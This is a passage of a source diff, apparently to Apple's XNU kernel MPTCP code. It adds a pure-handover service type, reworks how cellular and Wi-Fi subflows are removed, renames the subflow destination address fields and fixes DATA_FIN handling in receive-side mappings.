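 * only when random() % (n - icmplim_random) == 0, i.e. with probability
 * 1 / (n - icmplim_random): the first packet over the limit is always
 * answered (the modulus is 1), and the odds shrink as the burst continues.
 */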
index 39fabb2b1a39538bca49c4e4b3d7a247e45ac42c..85a8cebc17245d25404a55f3c89ef91adf5d12e7 100644 (file)
@@ -792,7 +792,7 @@ mptcp_subflow_is_slow(struct mptses *mpte, struct mptsub *mpts)
        struct tcpcb *tp = sototcpcb(mpts->mpts_socket);
        int fail_thresh = mptcp_fail_thresh;
 
-       if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) {
+       if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER || mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) {
                fail_thresh *= 2;
        }
 
@@ -908,7 +908,9 @@ mptcp_get_subflow(struct mptses *mpte, struct mptsub **preferred)
         * Second Step: Among best and second_best. Choose the one that is
         * most appropriate for this particular service-type.
         */
-       if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) {
+       if (mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) {
+               return mptcp_return_subflow(best);
+       } else if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) {
                /*
                 * Only handover if Symptoms tells us to do so.
                 */
@@ -1363,16 +1365,6 @@ mptcp_handle_deferred_upcalls(struct mppcb *mpp, uint32_t flag)
        }
 }
 
-void
-mptcp_ask_for_nat64(struct ifnet *ifp)
-{
-       in6_post_msg(ifp, KEV_INET6_REQUEST_NAT64_PREFIX, NULL, NULL);
-
-       os_log_info(mptcp_log_handle,
-           "%s: asked for NAT64-prefix on %s\n", __func__,
-           ifp->if_name);
-}
-
 static void
 mptcp_reset_itfinfo(struct mpt_itf_info *info)
 {
@@ -1517,7 +1509,7 @@ mptcp_session_necp_cb(void *handle, int action, uint32_t interface_index,
                }
 
                dst = mptcp_get_session_dst(mpte, has_v6, has_v4);
-               if (dst && (dst->sa_family == AF_INET || dst->sa_family == 0) &&
+               if (dst && dst->sa_family == AF_INET &&
                    has_v6 && !has_nat64 && !has_v4) {
                        if (found_slot) {
                                mpte->mpte_itfinfo[slot_index].ifindex = ifindex;
@@ -1525,7 +1517,6 @@ mptcp_session_necp_cb(void *handle, int action, uint32_t interface_index,
                                mpte->mpte_itfinfo[slot_index].has_v6_conn = has_v6;
                                mpte->mpte_itfinfo[slot_index].has_nat64_conn = has_nat64;
                        }
-                       mptcp_ask_for_nat64(ifp);
                        goto out;
                }
 
index 2767e56362d4a24816970dc1dd9491367d3030e6..31552007b605191c20ed8edb33a7f3e7975df5c2 100644 (file)
@@ -137,7 +137,7 @@ mptcp_setup_join_subflow_syn_opts(struct socket *so, u_char *opt, unsigned optle
        if (tp->t_mpflags & TMPF_BACKUP_PATH) {
                mpjoin_req.mmjo_subtype_bkp |= MPTCP_BACKUP;
        } else if (inp->inp_boundifp && IFNET_IS_CELLULAR(inp->inp_boundifp) &&
-           mpts->mpts_mpte->mpte_svctype < MPTCP_SVCTYPE_AGGREGATE) {
+           mptcp_subflows_need_backup_flag(mpts->mpts_mpte)) {
                mpjoin_req.mmjo_subtype_bkp |= MPTCP_BACKUP;
                tp->t_mpflags |= TMPF_BACKUP_PATH;
        } else {
@@ -974,6 +974,10 @@ mptcp_do_mpcapable_opt(struct tcpcb *tp, u_char *cp, struct tcphdr *th,
        if (((struct mptcp_mpcapable_opt_common *)cp)->mmco_flags &
            MPCAP_UNICAST_IPBIT) {
                mpte->mpte_flags |= MPTE_UNICAST_IP;
+
+               /* We need an explicit signal for the addresses - zero the existing ones */
+               memset(&mpte->mpte_sub_dst_v4, 0, sizeof(mpte->mpte_sub_dst_v4));
+               memset(&mpte->mpte_sub_dst_v6, 0, sizeof(mpte->mpte_sub_dst_v6));
        }
 
        rsp = (struct mptcp_mpcapable_opt_rsp *)cp;
@@ -1426,6 +1430,8 @@ mptcp_do_dss_opt(struct tcpcb *tp, u_char *cp, struct tcphdr *th)
        if (dss_rsp->mdss_subtype == MPO_DSS) {
                if (dss_rsp->mdss_flags & MDSS_F) {
                        tp->t_rcv_map.mpt_dfin = 1;
+               } else {
+                       tp->t_rcv_map.mpt_dfin = 0;
                }
 
                mptcp_do_dss_opt_meat(cp, tp, th);
@@ -1548,7 +1554,7 @@ mptcp_do_add_addr_opt(struct mptses *mpte, u_char *cp)
        }
 
        if (addr_opt->maddr_len == MPTCP_ADD_ADDR_OPT_LEN_V4) {
-               struct sockaddr_in *dst = &mpte->mpte_dst_unicast_v4;
+               struct sockaddr_in *dst = &mpte->mpte_sub_dst_v4;
                struct in_addr *addr = &addr_opt->maddr_u.maddr_addrv4;
                in_addr_t haddr = ntohl(addr->s_addr);
 
@@ -1573,7 +1579,7 @@ mptcp_do_add_addr_opt(struct mptses *mpte, u_char *cp)
                dst->sin_port = mpte->__mpte_dst_v4.sin_port;
                dst->sin_addr.s_addr = addr->s_addr;
        } else {
-               struct sockaddr_in6 *dst = &mpte->mpte_dst_unicast_v6;
+               struct sockaddr_in6 *dst = &mpte->mpte_sub_dst_v6;
                struct in6_addr *addr = &addr_opt->maddr_u.maddr_addrv6;
 
                if (IN6_IS_ADDR_LINKLOCAL(addr) ||
index f00002616c4ecd12183327d2de590b19475ebf23..3ea459376a17687eed84f8e0c27886e337ed0e3c 100644 (file)
@@ -495,27 +495,23 @@ mptcp_session_create(struct mppcb *mpp)
 struct sockaddr *
 mptcp_get_session_dst(struct mptses *mpte, boolean_t ipv6, boolean_t ipv4)
 {
-       if (!(mpte->mpte_flags & MPTE_UNICAST_IP)) {
-               return &mpte->mpte_dst;
+       if (ipv6 && mpte->mpte_sub_dst_v6.sin6_family == AF_INET6) {
+               return (struct sockaddr *)&mpte->mpte_sub_dst_v6;
        }
 
-       if (ipv6 && mpte->mpte_dst_unicast_v6.sin6_family == AF_INET6) {
-               return (struct sockaddr *)&mpte->mpte_dst_unicast_v6;
-       }
-
-       if (ipv4 && mpte->mpte_dst_unicast_v4.sin_family == AF_INET) {
-               return (struct sockaddr *)&mpte->mpte_dst_unicast_v4;
+       if (ipv4 && mpte->mpte_sub_dst_v4.sin_family == AF_INET) {
+               return (struct sockaddr *)&mpte->mpte_sub_dst_v4;
        }
 
        /* The interface has neither IPv4 nor IPv6 routes. Give our best guess,
         * meaning we prefer IPv6 over IPv4.
         */
-       if (mpte->mpte_dst_unicast_v6.sin6_family == AF_INET6) {
-               return (struct sockaddr *)&mpte->mpte_dst_unicast_v6;
+       if (mpte->mpte_sub_dst_v6.sin6_family == AF_INET6) {
+               return (struct sockaddr *)&mpte->mpte_sub_dst_v6;
        }
 
-       if (mpte->mpte_dst_unicast_v4.sin_family == AF_INET) {
-               return (struct sockaddr *)&mpte->mpte_dst_unicast_v4;
+       if (mpte->mpte_sub_dst_v4.sin_family == AF_INET) {
+               return (struct sockaddr *)&mpte->mpte_sub_dst_v4;
        }
 
        /* We don't yet have a unicast IP */
@@ -883,6 +879,7 @@ mptcp_check_subflows_and_add(struct mptses *mpte)
                return;
        }
 
+       /* Just to check whether we have an IP address available */
        if (mptcp_get_session_dst(mpte, false, false) == NULL) {
                return;
        }
@@ -921,6 +918,13 @@ mptcp_check_subflows_and_add(struct mptses *mpte)
 
                if (IFNET_IS_CELLULAR(ifp)) {
                        cellular_viable = TRUE;
+
+                       if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER ||
+                           mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) {
+                               if (!mptcp_is_wifi_unusable_for_session(mpte)) {
+                                       continue;
+                               }
+                       }
                }
 
                TAILQ_FOREACH(mpts, &mpte->mpte_subflows, mpts_entry) {
@@ -943,10 +947,11 @@ mptcp_check_subflows_and_add(struct mptses *mpte)
                                need_to_ask_symptoms = TRUE;
                        }
 
-                       if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) {
+                       if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER || mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) {
                                os_log(mptcp_log_handle,
-                                   "%s - %lx: handover: cell %u wifi-state %d flags %#x rxt %u first-party %u sb_cc %u ifindex %u this %u rtt %u rttvar %u rto %u\n",
+                                   "%s - %lx: %s: cell %u wifi-state %d flags %#x rxt %u first-party %u sb_cc %u ifindex %u this %u rtt %u rttvar %u rto %u\n",
                                    __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte),
+                                   mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER ? "handover" : "pure-handover",
                                    IFNET_IS_CELLULAR(subifp),
                                    mptcp_is_wifi_unusable_for_session(mpte),
                                    mpts->mpts_flags,
@@ -1058,13 +1063,6 @@ mptcp_check_subflows_and_add(struct mptses *mpte)
                        dst = (struct sockaddr *)&nat64pre;
                }
 
-               /* Initial subflow started on a NAT64'd address? */
-               if (!(mpte->mpte_flags & MPTE_UNICAST_IP) &&
-                   mpte->mpte_dst.sa_family == AF_INET6 &&
-                   mpte->mpte_dst_v4_nat64.sin_family == AF_INET) {
-                       dst = (struct sockaddr *)&mpte->mpte_dst_v4_nat64;
-               }
-
                if (dst->sa_family == AF_INET && !info->has_v4_conn) {
                        continue;
                }
@@ -1085,36 +1083,36 @@ static void
 mptcp_remove_cell_subflows(struct mptses *mpte)
 {
        struct mptsub *mpts, *tmpts;
-       boolean_t found = false;
 
-       TAILQ_FOREACH(mpts, &mpte->mpte_subflows, mpts_entry) {
+       TAILQ_FOREACH_SAFE(mpts, &mpte->mpte_subflows, mpts_entry, tmpts) {
                const struct ifnet *ifp = sotoinpcb(mpts->mpts_socket)->inp_last_outifp;
 
-               if (ifp == NULL || IFNET_IS_CELLULAR(ifp)) {
+               if (ifp == NULL || !IFNET_IS_CELLULAR(ifp)) {
                        continue;
                }
 
-               /* We have a functioning subflow on WiFi. No need for cell! */
-               if (mpts->mpts_flags & MPTSF_CONNECTED &&
-                   !mptcp_subflow_disconnecting(mpts)) {
-                       found = true;
-               }
-       }
+               os_log(mptcp_log_handle, "%s - %lx: removing cell subflow\n",
+                   __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte));
 
-       /* Didn't found functional sub on WiFi - stay on cell */
-       if (!found) {
-               return;
+               soevent(mpts->mpts_socket, SO_FILT_HINT_LOCKED | SO_FILT_HINT_MUSTRST);
        }
 
+       return;
+}
+
+static void
+mptcp_remove_wifi_subflows(struct mptses *mpte)
+{
+       struct mptsub *mpts, *tmpts;
+
        TAILQ_FOREACH_SAFE(mpts, &mpte->mpte_subflows, mpts_entry, tmpts) {
                const struct ifnet *ifp = sotoinpcb(mpts->mpts_socket)->inp_last_outifp;
 
-               /* Only remove cellular subflows */
-               if (ifp == NULL || !IFNET_IS_CELLULAR(ifp)) {
+               if (ifp == NULL || IFNET_IS_CELLULAR(ifp)) {
                        continue;
                }
 
-               os_log(mptcp_log_handle, "%s - %lx: removing cell subflow\n",
+               os_log(mptcp_log_handle, "%s - %lx: removing wifi subflow\n",
                    __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte));
 
                soevent(mpts->mpts_socket, SO_FILT_HINT_LOCKED | SO_FILT_HINT_MUSTRST);
@@ -1123,7 +1121,69 @@ mptcp_remove_cell_subflows(struct mptses *mpte)
        return;
 }
 
-/* Returns true if it removed a subflow on cell */
+static void
+mptcp_pure_handover_subflows_remove(struct mptses *mpte)
+{
+       int wifi_unusable = mptcp_is_wifi_unusable_for_session(mpte);
+       boolean_t found_working_wifi_subflow = false;
+       boolean_t found_working_cell_subflow = false;
+
+       struct mptsub *mpts;
+
+       /*
+        * Look for a subflow that is on a non-cellular interface in connected
+        * state.
+        *
+        * In that case, remove all cellular subflows.
+        *
+        * If however there is no working non-cellular subflow and Wi-Fi is
+        * unusable, keep the cellular subflows and, if a cellular subflow is
+        * working, remove the Wi-Fi subflows instead.
+        */
+       TAILQ_FOREACH(mpts, &mpte->mpte_subflows, mpts_entry) {
+               const struct ifnet *ifp = sotoinpcb(mpts->mpts_socket)->inp_last_outifp;
+               struct socket *so;
+               struct tcpcb *tp;
+
+               if (ifp == NULL) {
+                       continue;
+               }
+
+               so = mpts->mpts_socket;
+               tp = sototcpcb(so);
+
+               if (!(mpts->mpts_flags & MPTSF_CONNECTED) ||
+                   tp->t_state != TCPS_ESTABLISHED ||
+                   mptcp_subflow_disconnecting(mpts)) {
+                       continue;
+               }
+
+               if (IFNET_IS_CELLULAR(ifp)) {
+                       found_working_cell_subflow = true;
+               } else {
+                       os_log_debug(mptcp_log_handle, "%s - %lx: rxt %u sb_cc %u unusable %d\n",
+                           __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), tp->t_rxtshift, mptetoso(mpte)->so_snd.sb_cc, wifi_unusable);
+                       if (!mptcp_handover_use_cellular(mpte, tp)) {
+                               found_working_wifi_subflow = true;
+                       }
+               }
+       }
+
+       /*
+        * If we couldn't find a working Wi-Fi subflow while Wi-Fi is unusable,
+        * don't remove the cellular subflows; if a working cellular subflow
+        * exists, remove the Wi-Fi subflows instead.
+        */
+       os_log_debug(mptcp_log_handle, "%s - %lx: Found Wi-Fi: %u Found Cellular %u",
+           __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte),
+           found_working_wifi_subflow, found_working_cell_subflow);
+       if (!found_working_wifi_subflow && wifi_unusable) {
+               if (found_working_cell_subflow) {
+                       mptcp_remove_wifi_subflows(mpte);
+               }
+               return;
+       }
+
+       mptcp_remove_cell_subflows(mpte);
+}
+
 static void
 mptcp_handover_subflows_remove(struct mptses *mpte)
 {
@@ -1176,6 +1236,7 @@ static void
 mptcp_targetbased_subflows_remove(struct mptses *mpte)
 {
        uint64_t time_now = mach_continuous_time();
+       struct mptsub *mpts;
 
        if (mpte->mpte_time_target != 0 &&
            (int64_t)(mpte->mpte_time_target - time_now) <= 0 &&
@@ -1184,7 +1245,20 @@ mptcp_targetbased_subflows_remove(struct mptses *mpte)
                return;
        }
 
-       mptcp_remove_cell_subflows(mpte);
+       TAILQ_FOREACH(mpts, &mpte->mpte_subflows, mpts_entry) {
+               const struct ifnet *ifp = sotoinpcb(mpts->mpts_socket)->inp_last_outifp;
+
+               if (ifp == NULL || IFNET_IS_CELLULAR(ifp)) {
+                       continue;
+               }
+
+               /* We have a functioning subflow on WiFi. No need for cell! */
+               if (mpts->mpts_flags & MPTSF_CONNECTED &&
+                   !mptcp_subflow_disconnecting(mpts)) {
+                       mptcp_remove_cell_subflows(mpte);
+                       break;
+               }
+       }
 }
 
 /*
@@ -1200,6 +1274,10 @@ mptcp_check_subflows_and_remove(struct mptses *mpte)
 
        socket_lock_assert_owned(mptetoso(mpte));
 
+       if (mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) {
+               mptcp_pure_handover_subflows_remove(mpte);
+       }
+
        if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) {
                mptcp_handover_subflows_remove(mpte);
        }
@@ -1542,6 +1620,7 @@ mptcp_subflow_necp_cb(void *handle, __unused int action,
        mptcp_sched_create_subflows(mpte);
 
        if ((mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER ||
+           mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER ||
            mpte->mpte_svctype == MPTCP_SVCTYPE_TARGET_BASED) &&
            viable != NULL) {
                *viable = 1;
@@ -1639,6 +1718,9 @@ mptcp_subflow_socreate(struct mptses *mpte, struct mptsub *mpts, int dom,
        if (mp_so->so_flags1 & SOF1_DATA_IDEMPOTENT) {
                (*so)->so_flags1 |= SOF1_DATA_IDEMPOTENT;
        }
+       if (mp_so->so_flags1 & SOF1_DATA_AUTHENTICATED) {
+               (*so)->so_flags1 |= SOF1_DATA_AUTHENTICATED;
+       }
 
        /* Inherit uuid and create the related flow. */
        if (!uuid_is_null(mpsotomppcb(mp_so)->necp_client_uuid)) {
@@ -1920,7 +2002,7 @@ mptcp_subflow_soconnectx(struct mptses *mpte, struct mptsub *mpts)
 
 static int
 mptcp_adj_rmap(struct socket *so, struct mbuf *m, int off, uint64_t dsn,
-    uint32_t rseq, uint16_t dlen)
+    uint32_t rseq, uint16_t dlen, uint8_t dfin)
 {
        struct mptsub *mpts = sototcpcb(so)->t_mpsub;
 
@@ -1935,12 +2017,14 @@ mptcp_adj_rmap(struct socket *so, struct mbuf *m, int off, uint64_t dsn,
        if (m->m_pkthdr.pkt_flags & PKTF_MPTCP) {
                if (off && (dsn != m->m_pkthdr.mp_dsn ||
                    rseq != m->m_pkthdr.mp_rseq ||
-                   dlen != m->m_pkthdr.mp_rlen)) {
-                       os_log_error(mptcp_log_handle, "%s - %lx: Received incorrect second mapping: %u - %u , %u - %u, %u - %u\n",
+                   dlen != m->m_pkthdr.mp_rlen ||
+                   dfin != !!(m->m_pkthdr.pkt_flags & PKTF_MPTCP_DFIN))) {
+                       os_log_error(mptcp_log_handle, "%s - %lx: Received incorrect second mapping: DSN: %u - %u , SSN: %u - %u, DLEN: %u - %u, DFIN: %u - %u\n",
                            __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpts->mpts_mpte),
                            (uint32_t)dsn, (uint32_t)m->m_pkthdr.mp_dsn,
                            rseq, m->m_pkthdr.mp_rseq,
-                           dlen, m->m_pkthdr.mp_rlen);
+                           dlen, m->m_pkthdr.mp_rlen,
+                           dfin, !!(m->m_pkthdr.pkt_flags & PKTF_MPTCP_DFIN));
 
                        soevent(mpts->mpts_socket, SO_FILT_HINT_LOCKED | SO_FILT_HINT_MUSTRST);
                        return -1;
@@ -1948,12 +2032,12 @@ mptcp_adj_rmap(struct socket *so, struct mbuf *m, int off, uint64_t dsn,
        }
 
        /* If mbuf is beyond right edge of the mapping, we need to split */
-       if (m_pktlen(m) > dlen - off) {
-               struct mbuf *new = m_split(m, dlen - off, M_DONTWAIT);
+       if (m_pktlen(m) > dlen - dfin - off) {
+               struct mbuf *new = m_split(m, dlen - dfin - off, M_DONTWAIT);
                if (new == NULL) {
-                       os_log_error(mptcp_log_handle, "%s - %lx: m_split failed dlen %u off %d pktlen %d, killing subflow %d",
+                       os_log_error(mptcp_log_handle, "%s - %lx: m_split failed dlen %u dfin %u off %d pktlen %d, killing subflow %d",
                            __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpts->mpts_mpte),
-                           dlen, off, m_pktlen(m),
+                           dlen, dfin, off, m_pktlen(m),
                            mpts->mpts_connid);
 
                        soevent(mpts->mpts_socket, SO_FILT_HINT_LOCKED | SO_FILT_HINT_MUSTRST);
@@ -1973,10 +2057,19 @@ mptcp_adj_rmap(struct socket *so, struct mbuf *m, int off, uint64_t dsn,
        m->m_pkthdr.pkt_flags |= PKTF_MPTCP;
        m->m_pkthdr.mp_dsn = dsn + off;
        m->m_pkthdr.mp_rseq = rseq + off;
-
        VERIFY(m_pktlen(m) < UINT16_MAX);
        m->m_pkthdr.mp_rlen = (uint16_t)m_pktlen(m);
 
+       /* Only put the DATA_FIN-flag on the last mbuf of this mapping */
+       if (dfin) {
+               if (m->m_pkthdr.mp_dsn + m->m_pkthdr.mp_rlen < dsn + dlen - dfin) {
+                       m->m_pkthdr.pkt_flags &= ~PKTF_MPTCP_DFIN;
+               } else {
+                       m->m_pkthdr.pkt_flags |= PKTF_MPTCP_DFIN;
+               }
+       }
+
+
        mpts->mpts_flags |= MPTSF_FULLY_ESTABLISHED;
 
        return 0;
@@ -2123,7 +2216,8 @@ mptcp_subflow_soreceive(struct socket *so, struct sockaddr **psa,
        SBLASTMBUFCHK(&so->so_rcv, "mptcp_subflow_soreceive 1");
 
        while (m != NULL) {
-               int dlen = 0, dfin = 0, error_out = 0;
+               int dlen = 0, error_out = 0, off = 0;
+               uint8_t dfin = 0;
                struct mbuf *start = m;
                uint64_t dsn;
                uint32_t sseq;
@@ -2202,6 +2296,7 @@ fallback:
 
                                if (m_iter->m_pkthdr.pkt_flags & PKTF_MPTCP_DFIN) {
                                        dfin = 1;
+                                       dlen--;
                                }
 
                                break;
@@ -2232,13 +2327,14 @@ fallback:
 
                        if (m->m_pkthdr.pkt_flags & PKTF_MPTCP_DFIN) {
                                dfin = 1;
+                               dlen--;
                        }
                }
 
                /*
                 * Check if the full mapping is now present
                 */
-               if ((int)so->so_rcv.sb_cc < dlen - dfin) {
+               if ((int)so->so_rcv.sb_cc < dlen) {
                        if (*mp0 == NULL) {
                                error = EWOULDBLOCK;
                        }
@@ -2246,8 +2342,9 @@ fallback:
                }
 
                /* Now, get the full mapping */
+               off = 0;
                while (dlen > 0) {
-                       if (mptcp_adj_rmap(so, m, orig_dlen - dlen, dsn, sseq, orig_dlen)) {
+                       if (mptcp_adj_rmap(so, m, off, dsn, sseq, orig_dlen, dfin)) {
                                error_out = 1;
                                error = EIO;
                                dlen = 0;
@@ -2256,6 +2353,7 @@ fallback:
                        }
 
                        dlen -= m->m_len;
+                       off += m->m_len;
                        sbfree(&so->so_rcv, m);
 
                        if (mp != NULL) {
@@ -2265,11 +2363,7 @@ fallback:
                                *mp = NULL;
                        }
 
-                       if (dlen - dfin == 0) {
-                               dlen = 0;
-                       }
-
-                       VERIFY(dlen <= 0 || m);
+                       VERIFY(dlen == 0 || m);
                }
 
                VERIFY(dlen == 0);
@@ -2745,6 +2839,23 @@ mptcp_subflow_disconnect(struct mptses *mpte, struct mptsub *mpts)
                send_dfin = 1;
        }
 
+       if (mp_so->so_flags & SOF_DEFUNCT) {
+               errno_t ret;
+
+               ret = sosetdefunct(NULL, so, SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL, TRUE);
+               if (ret == 0) {
+                       ret = sodefunct(NULL, so, SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL);
+
+                       if (ret != 0) {
+                               os_log_error(mptcp_log_handle, "%s - %lx: sodefunct failed with %d\n",
+                                   __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), ret);
+                       }
+               } else {
+                       os_log_error(mptcp_log_handle, "%s - %lx: sosetdefunct failed with %d\n",
+                           __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), ret);
+               }
+       }
+
        if (!(so->so_state & (SS_ISDISCONNECTING | SS_ISDISCONNECTED)) &&
            (so->so_state & SS_ISCONNECTED)) {
                mptcplog((LOG_DEBUG, "%s: cid %d fin %d\n",
@@ -2755,26 +2866,9 @@ mptcp_subflow_disconnect(struct mptses *mpte, struct mptsub *mpts)
                        mptcp_send_dfin(so);
                }
 
-               if (mp_so->so_flags & SOF_DEFUNCT) {
-                       errno_t ret;
-
-                       ret = sosetdefunct(NULL, so, SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL, TRUE);
-                       if (ret == 0) {
-                               ret = sodefunct(NULL, so, SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL);
-
-                               if (ret != 0) {
-                                       os_log_error(mptcp_log_handle, "%s - %lx: sodefunct failed with %d\n",
-                                           __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), ret);
-                               }
-                       } else {
-                               os_log_error(mptcp_log_handle, "%s - %lx: sosetdefunct failed with %d\n",
-                                   __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), ret);
-                       }
-               } else {
-                       (void) soshutdownlock(so, SHUT_RD);
-                       (void) soshutdownlock(so, SHUT_WR);
-                       (void) sodisconnectlocked(so);
-               }
+               (void) soshutdownlock(so, SHUT_RD);
+               (void) soshutdownlock(so, SHUT_WR);
+               (void) sodisconnectlocked(so);
        }
 
        /*
@@ -3350,6 +3444,9 @@ done_sending:
                 */
                error = 0;
        } else {
+               /* We need to revert our change to mpts_rel_seq */
+               mpts->mpts_rel_seq -= tot_sent;
+
                os_log_error(mptcp_log_handle, "%s - %lx: %u error %d len %d subflags %#x sostate %#x soerror %u hiwat %u lowat %u\n",
                    __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), mpts->mpts_connid, error, tot_sent, so->so_flags, so->so_state, so->so_error, so->so_snd.sb_hiwat, so->so_snd.sb_lowat);
        }
@@ -3399,9 +3496,10 @@ mptcp_add_reinjectq(struct mptses *mpte, struct mbuf *m)
                /* m is already fully covered by the next mbuf in the queue */
                if (n->m_pkthdr.mp_dsn == m->m_pkthdr.mp_dsn &&
                    n->m_pkthdr.mp_rlen >= m->m_pkthdr.mp_rlen) {
-                       mptcplog((LOG_DEBUG, "%s fully covered with len %u\n",
-                           __func__, n->m_pkthdr.mp_rlen),
-                           MPTCP_SOCKET_DBG, MPTCP_LOGLVL_VERBOSE);
+                       os_log(mptcp_log_handle, "%s - %lx: dsn %u dlen %u rseq %u fully covered with len %u\n",
+                           __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte),
+                           (uint32_t)m->m_pkthdr.mp_dsn, m->m_pkthdr.mp_rlen,
+                           m->m_pkthdr.mp_rseq, n->m_pkthdr.mp_rlen);
                        goto dont_queue;
                }
 
@@ -3409,10 +3507,10 @@ mptcp_add_reinjectq(struct mptses *mpte, struct mbuf *m)
                if (m->m_pkthdr.mp_dsn + m->m_pkthdr.mp_rlen >= n->m_pkthdr.mp_dsn + n->m_pkthdr.mp_rlen) {
                        struct mbuf *tmp = n->m_nextpkt;
 
-                       mptcplog((LOG_DEBUG, "%s m is covering that guy dsn %u len %u dsn %u len %u\n",
-                           __func__, (uint32_t)m->m_pkthdr.mp_dsn, m->m_pkthdr.mp_rlen,
-                           (uint32_t)n->m_pkthdr.mp_dsn, n->m_pkthdr.mp_rlen),
-                           MPTCP_SOCKET_DBG, MPTCP_LOGLVL_VERBOSE);
+                       os_log(mptcp_log_handle, "%s - %lx: m (dsn %u len %u) is covering existing mbuf (dsn %u len %u)\n",
+                           __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte),
+                           (uint32_t)m->m_pkthdr.mp_dsn, m->m_pkthdr.mp_rlen,
+                           (uint32_t)n->m_pkthdr.mp_dsn, n->m_pkthdr.mp_rlen);
 
                        m->m_nextpkt = NULL;
                        if (prev == NULL) {
@@ -3429,9 +3527,10 @@ mptcp_add_reinjectq(struct mptses *mpte, struct mbuf *m)
        if (prev) {
                /* m is already fully covered by the previous mbuf in the queue */
                if (prev->m_pkthdr.mp_dsn + prev->m_pkthdr.mp_rlen >= m->m_pkthdr.mp_dsn + m->m_pkthdr.len) {
-                       mptcplog((LOG_DEBUG, "%s prev covers us from %u with len %u\n",
-                           __func__, (uint32_t)prev->m_pkthdr.mp_dsn, prev->m_pkthdr.mp_rlen),
-                           MPTCP_SOCKET_DBG, MPTCP_LOGLVL_VERBOSE);
+                       os_log(mptcp_log_handle, "%s - %lx: prev (dsn %u len %u) covers us (dsn %u len %u)\n",
+                           __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte),
+                           (uint32_t)prev->m_pkthdr.mp_dsn, prev->m_pkthdr.mp_rlen,
+                           (uint32_t)m->m_pkthdr.mp_dsn, m->m_pkthdr.mp_rlen);
                        goto dont_queue;
                }
        }
@@ -3547,6 +3646,7 @@ mptcp_reinject_mbufs(struct socket *so)
        m = sb->sb_mb;
        while (m) {
                struct mbuf *n = m->m_next, *orig = m;
+               bool set_reinject_flag = false;
 
                mptcplog((LOG_DEBUG, "%s working on suna %u relseq %u iss %u len %u pktflags %#x\n",
                    __func__, tp->snd_una, m->m_pkthdr.mp_rseq, mpts->mpts_iss,
@@ -3587,6 +3687,7 @@ mptcp_reinject_mbufs(struct socket *so)
                 */
                mptcp_add_reinjectq(mpte, m);
 
+               set_reinject_flag = true;
                orig->m_pkthdr.pkt_flags |= PKTF_MPTCP_REINJ;
 
 next:
@@ -3598,7 +3699,9 @@ next:
                                break;
                        }
 
-                       n->m_pkthdr.pkt_flags |= PKTF_MPTCP_REINJ;
+                       if (set_reinject_flag) {
+                               n->m_pkthdr.pkt_flags |= PKTF_MPTCP_REINJ;
+                       }
                        n = n->m_next;
                }
 
@@ -3969,11 +4072,9 @@ mptcp_handle_ipv6_connection(struct mptses *mpte, const struct mptsub *mpts)
        ifp = sotoinpcb(so)->inp_last_outifp;
 
        if (ifnet_get_nat64prefix(ifp, nat64prefixes) == ENOENT) {
-               mptcp_ask_for_nat64(ifp);
                return;
        }
 
-
        for (j = 0; j < NAT64_MAX_NUM_PREFIXES; j++) {
                int success;
 
@@ -3983,11 +4084,11 @@ mptcp_handle_ipv6_connection(struct mptses *mpte, const struct mptsub *mpts)
 
                success = mptcp_desynthesize_ipv6_addr(&mpte->__mpte_dst_v6.sin6_addr,
                    &nat64prefixes[j],
-                   &mpte->mpte_dst_v4_nat64.sin_addr);
+                   &mpte->mpte_sub_dst_v4.sin_addr);
                if (success) {
-                       mpte->mpte_dst_v4_nat64.sin_len = sizeof(mpte->mpte_dst_v4_nat64);
-                       mpte->mpte_dst_v4_nat64.sin_family = AF_INET;
-                       mpte->mpte_dst_v4_nat64.sin_port = mpte->__mpte_dst_v6.sin6_port;
+                       mpte->mpte_sub_dst_v4.sin_len = sizeof(mpte->mpte_sub_dst_v4);
+                       mpte->mpte_sub_dst_v4.sin_family = AF_INET;
+                       mpte->mpte_sub_dst_v4.sin_port = mpte->__mpte_dst_v6.sin6_port;
                        break;
                }
        }
@@ -4151,7 +4252,7 @@ mptcp_subflow_connected_ev(struct mptses *mpte, struct mptsub *mpts,
                        mptcp_notify_mpfail(so);
                } else {
                        if (IFNET_IS_CELLULAR(inp->inp_last_outifp) &&
-                           mpte->mpte_svctype < MPTCP_SVCTYPE_AGGREGATE) {
+                           mptcp_subflows_need_backup_flag(mpte)) {
                                tp->t_mpflags |= (TMPF_BACKUP_PATH | TMPF_SND_MPPRIO);
                        } else {
                                mpts->mpts_flags |= MPTSF_PREFERRED;
@@ -4186,7 +4287,7 @@ mptcp_subflow_connected_ev(struct mptses *mpte, struct mptsub *mpts,
                 */
